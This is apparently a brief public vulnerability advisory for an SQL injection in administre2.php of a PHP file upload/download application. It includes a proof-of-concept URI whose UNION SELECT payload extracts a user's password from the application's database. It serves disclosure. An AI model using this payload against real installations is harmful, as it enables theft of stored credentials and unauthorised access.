Upload_download_de_fichiers Administre2.PHP SQL Injection Vulnerability

Upload_download_de_fichiers Administre2.PHP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/administration/administre2.php?id_user=-1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload_fichier%20WHERE%20id_user=1